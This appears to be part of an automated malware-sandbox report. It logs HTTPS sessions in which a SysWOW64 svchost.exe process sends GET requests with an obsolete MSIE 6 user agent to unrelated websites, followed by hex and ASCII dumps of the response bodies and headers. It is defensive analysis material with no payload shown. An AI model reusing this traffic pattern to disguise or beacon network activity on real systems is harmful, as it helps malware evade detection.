                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5308INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5324INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                                                        Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5340INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5356INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5372INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5388INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5404INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5420INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5436INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5452INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5468INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5484INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                                                        Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5500INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5516INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                                                        Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        17192.168.2.36469894.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2824OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2824INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2825INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        18192.168.2.364737172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2824OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2893INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Set-Cookie: d55e479f054c94814cbc10d217aaa990=0a5ebc1449abc3425c313b4d87f9b185; path=/; HttpOnly
                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 31 May 2023 12:52:01 GMT
                                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oRkCWtgfItINfMFEiV32cPLPE%2FD1YjMSBgZ98TOhlJI2Ce5sjWuTYIZ1yxWU%2BUcKJUMaMIvNm6wg7SAeF6MyXA9eMAjXZ1Qj9b55AD1OX12lV1%2FGKmpkph4krtxppQUdtZJg7%2B9YX08%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 7cff59fba8f618eb-FRA
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
